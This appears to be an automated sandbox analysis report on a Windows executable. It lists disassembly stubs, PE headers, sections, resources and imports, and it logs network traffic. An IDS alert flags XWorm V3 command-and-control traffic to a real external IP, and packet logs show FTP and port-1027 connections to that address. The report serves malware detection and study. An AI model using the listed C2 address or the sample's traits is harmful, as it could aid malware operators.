push dword ptr [ebp+08h]
push 00000000h
push dword ptr [005668F8h]
call dword ptr [0051A284h]
test eax, eax
jne 00007FF5BD4211EAh
push esi
call 00007FF5BD421B94h
mov esi, eax
call dword ptr [0051A3B8h]
push eax
call 00007FF5BD421B44h
pop ecx
mov dword ptr [esi], eax
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
mov dword ptr [ebp-04h], esi
mov dword ptr [ebp-08h], 004F6BB5h
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp-08h]
push dword ptr [ebp+08h]
call 00007FF5BD436D44h
mov eax, dword ptr [ebp+0Ch]
mov eax, dword ptr [eax+04h]
and eax, FFFFFFFDh
mov ecx, dword ptr [ebp+0Ch]
mov dword ptr [ecx+04h], eax
mov edi, dword ptr fs:[00000000h]
mov ebx, dword ptr [ebp-04h]
mov dword ptr [ebx], edi
mov dword ptr fs:[00000000h], ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x156ef0	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x168000	0x13ed8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17c000	0x19830	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x141ce0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11a000	0x938	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1185ec	0x118600	47e40bd6a282dee1c089093e199075b8	False	0.5605155274743647	COM executable for DOS	6.531001043276293	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11a000	0x4011a	0x40200	e5f1d04a5ec47adee9442025055161ba	False	0.26816825048732945	OpenPGP Public Key	5.111461654496195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15b000	0xcee4	0x5a00	45b7eabb4645816a4fccf0be63d7431c	False	0.28289930555555554	data	4.725599040760168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x168000	0x13ed8	0x14000	9c8a2b0a3be8285303473e18df5784b2	False	0.734814453125	data	6.841265361918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17c000	0x28dfe	0x28e00	5eed111ba51353176740a71eece7f19e	False	0.26180834288990823	data	4.909643658584558	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x168d78	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Chinese	China	0.4805194805194805
RT_CURSOR	0x168eac	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Chinese	China	0.7
RT_CURSOR	0x168f60	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.36363636363636365
RT_CURSOR	0x169094	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.35714285714285715
RT_CURSOR	0x1691c8	0x134	data	Chinese	China	0.37337662337662336
RT_CURSOR	0x1692fc	0x134	data	Chinese	China	0.37662337662337664
RT_CURSOR	0x169430	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x169564	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.37662337662337664
RT_CURSOR	0x169698	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x1697cc	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.38636363636363635
RT_CURSOR	0x169900	0x134	data	Chinese	China	0.44155844155844154
RT_CURSOR	0x169a34	0x134	data	Chinese	China	0.4155844155844156
RT_CURSOR	0x169b68	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.5422077922077922
RT_CURSOR	0x169c9c	0x134	data	Chinese	China	0.2662337662337662
RT_CURSOR	0x169dd0	0x134	data	Chinese	China	0.2824675324675325
RT_CURSOR	0x169f04	0x134	data	Chinese	China	0.3246753246753247
RT_BITMAP	0x16a038	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Chinese	China	0.44565217391304346
RT_BITMAP	0x16a0f0	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.37962962962962965
RT_ICON	0x16a234	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.5335365853658537
RT_ICON	0x16a89c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.646505376344086
RT_ICON	0x16ab84	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.6598360655737705
RT_ICON	0x16ad6c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.6385135135135135
RT_ICON	0x16ae94	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.6260660980810234
RT_ICON	0x16bd3c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.7793321299638989
RT_ICON	0x16c5e4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.8231566820276498
RT_ICON	0x16ccac	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.6575144508670521
RT_ICON	0x16d214	0x93cb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9988106250825954
RT_ICON	0x1765e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.5116182572614107
RT_ICON	0x178b88	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.6109287054409006
RT_ICON	0x179c30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.6221311475409836
RT_ICON	0x17a5b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.7402482269503546
RT_DIALOG	0x17aa20	0x10c	data	Chinese	China	0.6343283582089553
RT_DIALOG	0x17ab2c	0xd0	data	Chinese	China	0.7067307692307693
RT_DIALOG	0x17abfc	0xe2	data	Chinese	China	0.6769911504424779
RT_DIALOG	0x17ace0	0x34	data	Chinese	China	0.8653846153846154
RT_STRING	0x17ad14	0x3a	data	Chinese	China	0.6379310344827587
RT_STRING	0x17ad50	0x4e	data	Chinese	China	0.8461538461538461
RT_STRING	0x17ada0	0x2c	data	Chinese	China	0.5909090909090909
RT_STRING	0x17adcc	0x84	data	Chinese	China	0.9166666666666666
RT_STRING	0x17ae50	0x1c4	data	Chinese	China	0.8053097345132744
RT_STRING	0x17b014	0x14e	data	Chinese	China	0.5179640718562875
RT_STRING	0x17b164	0x10e	data	Chinese	China	0.7037037037037037
RT_STRING	0x17b274	0x50	data	Chinese	China	0.7125
RT_STRING	0x17b2c4	0x44	data	Chinese	China	0.6764705882352942
RT_STRING	0x17b308	0x68	data	Chinese	China	0.7019230769230769
RT_STRING	0x17b370	0x1b2	data	Chinese	China	0.6474654377880185
RT_STRING	0x17b524	0xf4	data	Chinese	China	0.6065573770491803
RT_STRING	0x17b618	0x24	data	Chinese	China	0.4722222222222222
RT_STRING	0x17b63c	0x1a6	data	Chinese	China	0.6658767772511849
RT_GROUP_CURSOR	0x17b7e4	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China	1.0294117647058822
RT_GROUP_CURSOR	0x17b808	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b81c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b830	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b844	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b858	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b86c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b880	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b894	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b8a8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b8bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b8d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b8e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b8f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x17b90c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_ICON	0x17b920	0xbc	data	Chinese	China	0.6117021276595744
RT_VERSION	0x17b9dc	0x29c	data	Chinese	China	0.5
RT_MANIFEST	0x17bc78	0x25f	ASCII text, with very long lines (607), with no line terminators	English	United States	0.43492586490939045

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, TlsFree, InterlockedIncrement, DeleteFileA, lstrcpyA, GlobalHandle, FileTimeToSystemTime, lstrcmpiA, ReadFile, WriteFile, SetFilePointer, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, GetFileSize, DuplicateHandle, GetVolumeInformationA, GetFullPathNameA, GetCPInfo, GetOEMCP, SetErrorMode, GetFileAttributesExA, FileTimeToLocalFileTime, GetFileAttributesA, GetFileSizeEx, GetFileTime, GetTempFileNameA, GetTempPathA, GetTickCount, GetWindowsDirectoryA, GetNumberFormatA, InitializeCriticalSectionAndSpinCount, GetProfileIntA, SearchPathA, FindResourceExW, EncodePointer, DecodePointer, ExitProcess, HeapAlloc, GetSystemTimeAsFileTime, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapFree, RtlUnwind, RaiseException, GetSystemInfo, VirtualQuery, HeapReAlloc, ExitThread, CreateThread, HeapQueryInformation, HeapSize, SetStdHandle, GetFileType, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, LocalReAlloc, GetStdHandle, HeapCreate, IsValidCodePage, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, QueryPerformanceCounter, GetStringTypeW, LCMapStringW, CompareStringW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, WriteConsoleW, CreateFileW, SetEnvironmentVariableA, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GlobalFlags, GetCurrentDirectoryA, GlobalGetAtomNameA, GlobalFindAtomA, GetVersionExA, LoadLibraryW, lstrcmpW, InterlockedDecrement, GetModuleFileNameW, ReleaseActCtx, CreateActCtxW, GlobalAddAtomA, WaitForSingleObject, ResumeThread, SetThreadPriority, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MulDiv, GetCurrentProcessId, GlobalUnlock, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, FindResourceA, FreeResource, GlobalFree, GlobalDeleteAtom, GetCurrentThreadId, MultiByteToWideChar, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, GetLocaleInfoA, CompareStringA, ActivateActCtx, LoadLibraryA, GetLastError, DeactivateActCtx, SetLastError, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleW, TlsSetValue, TlsAlloc, InitializeCriticalSection, FindResourceW, LoadResource, LockResource, SizeofResource, WideCharToMultiByte, GetModuleFileNameA, InitOnceExecuteOnce, VirtualAlloc, FreeLibrary, VirtualProtect, CreateFileA, GetCurrentThread, Sleep, CloseHandle, IsDebuggerPresent, lstrcatA, lstrlenA, FindClose, FindNextFileA, FindFirstFileA, GetEnvironmentVariableA, GetProcAddress, GetModuleHandleA, CheckRemoteDebuggerPresent, GetACP, GetCurrentProcess
USER32.dll	GetMenuDefaultItem, DestroyIcon, UnregisterClassA, TranslateAcceleratorA, BringWindowToTop, InsertMenuItemA, LoadAcceleratorsA, LoadImageA, LoadMenuA, ReuseDDElParam, UnpackDDElParam, SetParent, DestroyAcceleratorTable, SetClassLongA, DrawIconEx, DrawEdge, DrawFrameControl, DrawFocusRect, ToAsciiEx, MapVirtualKeyA, GetKeyboardLayout, GetKeyboardState, LoadAcceleratorsW, CreateAcceleratorTableA, SetCursorPos, LockWindowUpdate, RegisterClipboardFormatA, InvertRect, HideCaret, GetIconInfo, CopyImage, OpenClipboard, SetClipboardData, CloseClipboard, EmptyClipboard, LoadImageW, FrameRect, CopyIcon, CharUpperBuffA, PostThreadMessageA, GetKeyNameTextA, DefFrameProcA, DefMDIChildProcA, DrawMenuBar, TranslateMDISysAccel, CreateMenu, IsClipboardFormatAvailable, GetUpdateRect, GetDoubleClickTime, IsCharLowerA, MapVirtualKeyExA, SubtractRect, DestroyCursor, GetWindowRgn, EnumDisplayMonitors, SetRectEmpty, KillTimer, SetTimer, RealChildWindowFromPoint, DeleteMenu, WaitMessage, ReleaseCapture, LoadCursorA, LoadCursorW, WindowFromPoint, SetCapture, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, CheckDlgButton, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassLongA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, MonitorFromWindow, GetMonitorInfoA, MapWindowPoints, ScrollWindow, CharUpperA, TrackPopupMenu, SetMenuDefaultItem, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SystemParametersInfoA, DestroyMenu, GetMenuItemInfoA, InflateRect, CopyRect, GetClassNameA, InvalidateRect, UpdateWindow, DrawStateA, ShowOwnedPopups, SetCursor, GetMessageA, TranslateMessage, DispatchMessageA, IsWindowVisible, GetKeyState, PeekMessageA, ValidateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapW, ModifyMenuA, EnableMenuItem, CheckMenuItem, SetWindowsHookExA, UnhookWindowsHookEx, GetCursorPos, CallNextHookEx, GetFocus, GetWindowRect, PtInRect, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, ScreenToClient, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, GetMenuState, GetMenuStringA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, GetWindowThreadProcessId, GetLastActivePopup, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetWindowLongA, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, RegisterWindowMessageA, GetWindow, GetParent, MapDialogRect, SetWindowPos, PostQuitMessage, PostMessageA, MessageBoxA, LoadIconW, GetSystemMenu, AppendMenuA, SendMessageA, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, EnableWindow, IsZoomed, GetAsyncKeyState, NotifyWinEvent, RedrawWindow, SetWindowRgn, CreatePopupMenu, IsMenu, MonitorFromPoint, UpdateLayeredWindow, EnableScrollBar, SetMenu, UnionRect, LoadMenuW, MessageBeep, GetNextDlgGroupItem, IntersectRect, SetRect, IsRectEmpty, CopyAcceleratorTableA, OffsetRect, GetSysColorBrush, SetLayeredWindowAttributes
MSIMG32.dll	TransparentBlt, AlphaBlend
COMCTL32.dll	ImageList_GetIconSize
SHLWAPI.dll	PathIsUNCA, PathStripToRootA, PathFindFileNameA, PathFindExtensionA, PathRemoveFileSpecW
gdiplus.dll	GdipDrawImageI, GdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipFree, GdipAlloc, GdipDeleteGraphics, GdipDisposeImage, GdipCreateBitmapFromHBITMAP, GdiplusStartup, GdiplusShutdown, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipCloneImage, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePaletteSize, GdipGetImagePalette
WININET.dll	InternetOpenA, InternetConnectA, FtpOpenFileA, FtpGetFileSize, InternetReadFile, InternetCloseHandle, InternetCrackUrlA
OLEACC.dll	CreateStdAccessibleObject, AccessibleObjectFromWindow, LresultFromObject
IMM32.dll	ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll	PlaySoundA
GDI32.dll	CreateRectRgnIndirect, GetTextMetricsA, EnumFontFamiliesA, GetTextCharsetInfo, CopyMetaFileA, CreateDCA, SaveDC, RestoreDC, SetBkColor, SetBkMode, SetPolyFillMode, SetROP2, SetTextColor, SetMapMode, GetClipBox, ExcludeClipRect, IntersectClipRect, LineTo, CreateCompatibleBitmap, CreateDIBitmap, GetTextExtentPoint32A, CreateFontIndirectA, CreateHatchBrush, CreateSolidBrush, CreatePen, GetObjectType, MoveToEx, SetTextAlign, GetLayout, SetLayout, DeleteObject, SelectClipRgn, CreateRectRgn, GetObjectA, GetViewportExtEx, GetWindowExtEx, BitBlt, GetPixel, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, SelectObject, SelectPalette, GetStockObject, CreateCompatibleDC, CreateBitmap, CreatePatternBrush, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, GetBkColor, GetTextColor, GetRgnBox, SetRectRgn, GetDeviceCaps, CombineRgn, PatBlt, DPtoLP, CreateRoundRectRgn, CreateDIBSection, CreatePolygonRgn, CreateEllipticRgn, Polyline, Ellipse, Polygon, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, RealizePalette, GetSystemPaletteEntries, OffsetRgn, SetDIBColorTable, StretchBlt, SetPixel, Rectangle, EnumFontFamiliesExA, ExtFloodFill, SetPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, GetTextFaceA, SetPixelV, SetWindowOrgEx
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
COMDLG32.dll	GetFileTitleA
ADVAPI32.dll	RegEnumKeyExA, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegEnumValueA
SHELL32.dll	SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, SHGetDesktopFolder, DragFinish, DragQueryFileA, ShellExecuteA, SHGetPathFromIDListA, SHAppBarMessage
ole32.dll	OleTranslateAccelerator, IsAccelerator, OleLockRunning, OleGetClipboard, RegisterDragDrop, CoLockObjectExternal, RevokeDragDrop, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CoInitializeEx, DoDragDrop, CreateStreamOnHGlobal, CoCreateGuid, CoInitialize, CoCreateInstance, CoUninitialize, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit, SysStringLen, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocString, SysAllocStringLen, SysFreeString, VarBstrFromDate

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:02:51.442921+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.9	50002	45.207.215.58	7000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:01:03.327569008 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:03.332379103 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:03.332457066 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.115503073 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:04.115566969 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.115994930 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.120775938 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:04.422133923 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:04.422220945 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.422363043 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.427088976 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:04.895879984 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:04.895941973 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.896173954 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:04.900907993 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:05.202058077 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:05.202119112 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.202485085 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.207273006 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:05.968811035 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:05.968935013 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.969685078 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.974523067 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:05.974637032 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.974766970 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:05.979535103 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:06.281235933 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:06.281723976 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:06.281836033 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:06.286593914 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.000880957 CET	21	49726	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.000940084 CET	49726	21	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.005131960 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.005168915 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.005182981 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.005197048 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.005234003 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.005283117 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.008712053 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.008725882 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.008737087 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.008749962 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.008759022 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.008771896 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.008814096 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.010025978 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010063887 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010076046 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010112047 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.010143042 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010158062 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.010252953 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.010514021 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010524988 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.010574102 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.218271971 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218296051 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218307972 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218319893 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218385935 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218398094 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218410015 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218420982 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.218513012 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.218513012 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.218513012 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.221383095 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221421957 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221452951 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.221471071 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.221523046 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221560955 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221561909 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.221575975 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221587896 CET	1027	49738	45.207.215.58	192.168.2.9
Jan 2, 2025 09:01:07.221596003 CET	49738	1027	192.168.2.9	45.207.215.58
Jan 2, 2025 09:01:07.221600056 CET	1027	49738	45.207.215.58	192.168.2.9
